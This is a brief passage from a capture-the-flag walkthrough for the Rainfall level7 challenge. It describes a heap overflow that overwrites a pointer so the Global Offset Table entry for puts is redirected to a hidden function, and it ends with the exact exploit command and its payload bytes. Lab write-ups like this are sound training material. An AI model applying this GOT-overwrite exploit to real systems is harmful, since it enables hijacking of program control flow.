selfsigned/HackThePlanet/Rainfall/level7/walkthrough.md

 +++ killed by SIGSEGV +++
 ```

+We see here that if we can succesfully overwrite the value in b[1] with our argv[1], we can then write to that address in b[1].
 So we can use it to overwrite the Global Offset Table value of `puts` with the address of `m`.
 ```shell
 level7@RainFall:~$ ./level7 $(python -c 'print "a"*20 + "\x28\x99\x04\x08"') $(python -c 'print "\xf4\x84\x04\x08"')